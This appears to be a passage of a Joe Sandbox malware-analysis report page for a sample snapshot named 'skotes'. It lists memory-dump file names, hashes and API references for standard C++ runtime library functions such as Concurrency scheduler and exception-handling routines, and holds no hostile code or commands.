Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: 0fe07ac36279be14936c387e78b23d722d97908927f12d1634eb63d0cf41ccd9
Instruction ID: 9c6c6180eb818b241cece673ee3f8c78ac3d3451601130bc575a7274603c5e8c
Opcode Fuzzy Hash: 0fe07ac36279be14936c387e78b23d722d97908927f12d1634eb63d0cf41ccd9
Instruction Fuzzy Hash: E671CF70900249AFDF15CF58CA80BBF7BB5AF66304F04409AEC416B352C7B99D16EB65

Function 00492832 Relevance: 15.2, APIs: 10, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00492876
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004928DF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00492913

Part of subcall function 004907ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0049080D

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00492993
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004929DB

Part of subcall function 004907C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004907DE

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004929EF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00492A00
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00492A4D
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00492A7E

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
String ID:
API String ID: 1321587334-0
Opcode ID: 12e6e06f1f0a055e68399a8ac667ce2464b8e5807ab875c8aab2c8392d3b3bfc
Instruction ID: 0f0fdfc998e3eeaf1f603c78ee9785ba4c562b9425128092f4585d8e27eac263
Opcode Fuzzy Hash: 12e6e06f1f0a055e68399a8ac667ce2464b8e5807ab875c8aab2c8392d3b3bfc
Instruction Fuzzy Hash: 7E81CE72A01616AFCF18DFA9EA9096EBFB1BB48314B14403FD445A3351DB786D41CB9C

Function 004969DA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00496A1F
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00496A51
List.LIBCONCRT ref: 00496A8C
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00496A9D
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00496AB9
List.LIBCONCRT ref: 00496AF4
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00496B05
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00496B20
List.LIBCONCRT ref: 00496B5B
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00496B68

Part of subcall function 00495EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00495EF7
Part of subcall function 00495EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00495F09

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
Instruction ID: f5023cacd5944e404b97f14eeedc00ca22dca9adbb0bc28980cd8e4e053bc7f3
Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
Instruction Fuzzy Hash: 1C516F70A00219ABDF04DF65C495FEEB7A8BF08344F15447EE905AB381DB38AE05CB94

Function 004A52A5 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 004A53A0
type_info::operator==.LIBVCRUNTIME ref: 004A53C7
___TypeMatch.LIBVCRUNTIME ref: 004A54D3
IsInExceptionSpec.LIBVCRUNTIME ref: 004A55AE
CallUnexpected.LIBVCRUNTIME ref: 004A5650

Strings

csm, xrefs: 004A534D
csm, xrefs: 004A53FE
csm, xrefs: 004A52E0

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 4162181273-393685449
Opcode ID: 317d88e5a178b8669ae550446afc8ed579e571dda5d263ba658a78d02d0239eb
Instruction ID: 694511cb2108eb0ed303be49fbcef4c0c8eb89fbecd5d7903cba360ca4ccbd16
Opcode Fuzzy Hash: 317d88e5a178b8669ae550446afc8ed579e571dda5d263ba658a78d02d0239eb
Instruction Fuzzy Hash: 85C1AA71C00609EFCF14DF95CA80AAEBBB5BF6A315F00415BF8056B206D379DA51CB99

Function 004A4840 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004A4877
___except_validate_context_record.LIBVCRUNTIME ref: 004A487F
_ValidateLocalCookies.LIBCMT ref: 004A4908
__IsNonwritableInCurrentImage.LIBCMT ref: 004A4933
_ValidateLocalCookies.LIBCMT ref: 004A4988

Strings

S9J, xrefs: 004A4925, 004A492E, 004A493F
csm, xrefs: 004A491D

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
